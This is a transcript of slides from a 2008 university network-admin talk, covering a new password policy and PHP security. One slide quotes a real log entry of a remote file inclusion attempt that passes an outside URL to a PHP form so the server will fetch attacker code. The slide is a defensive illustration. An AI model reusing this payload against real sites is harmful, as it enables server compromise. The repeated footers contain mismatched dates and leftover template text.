The document discusses two topics: a new university password policy and fun with PHP. The password policy summary points include yearly password changes, minimum length of 6 characters including two digits or punctuation, and locking out accounts after 5 failed attempts. The PHP section provides a brief history and overview of PHP, noting it is a powerful but flexible server-side scripting language that can enable massive security holes if not coded properly. It encourages validating all user input and provides some examples of attacks seen on PHP applications.

1. Password Policy
and
PHP Fun
Simon Bennett
th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]

2. Password Policy
 Approved at LISC 25/02/2008
 Taken a number of years
 Final release yesterday
 Will be downloadable from the ICS pages soon
 Fairly straightforward
 Slightly controversial (lockout/strength check)
 NOT an ICS policy
 University policy
 Salient points
 Yearly password changes
 >6 Chars must include 2 digits or punctuation
 Never give out your password
 No one should ever ask for your password
 Password lock-out after 5 attempts
 We reserve the right to try and crack passwords
th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]

3. Fun with PHP
 Brief history
 PHP/FI 1995 1% Rasmus Lerdorf
 PHP/FI v2.0 1997 RIP!
 PHP 3.0 June ‘98
 Andi Gutmans/Zeev Suraski
 Extensive extensibility
 10% installation
 PHP 4.0
 May 2000
 Zend engine
 Improved performance & modularity
 >20% installation
 PHP 5.0
 Zend 2.0 engine
th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]

4. Fun with PHP
 What is PHP?
 Server side scripting language
 I think it’s a bit like C (discuss )
 Extremely powerful
 Extremely flexible
 Extremely easy to write badly!
 1 PHP page can drive a whole site
 Because it’s so powerful, It can lead to massive holes in
(y)our the server
 Plenty of canned code out there
 Canned code
 If you use it make sure you check to see if it’s updated
th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]

5. Fun with PHP
 Sky recieves 22800 hits per day
 500 of them are these sorts of requests
 The sort of attacks we see
 81-86-41-163.dsl.pipex.com - - [01/Mar/2008:02:49:20 +0000]
"GET
/law/PhPforms/index.php?act=http://freewebs.com/diegoxfelix/c
h.txt?? HTTP/1.1" 200 - "-" "Mozilla/3.0 (compatible; Indy
Library)“
 Means:
 81-86-41-163.dsl.pipex.com
 [01/Mar/2008:02:49:20 +0000]
 GET
 /law/PhPforms/index.php?act=
 http://freewebs.com/diegoxfelix/ch.txt??
 HTTP/1.1
 200
 Mozilla/3.0 (compatible; Indy Library)
th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]

6. Fun with PHP
 Simple rules to follow
 Just good coding practice
 Declare and initialise variables first
 Don’t trust the user, validate everything
 An example, another to explain
 A bad example
 A shockingly bad example
th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]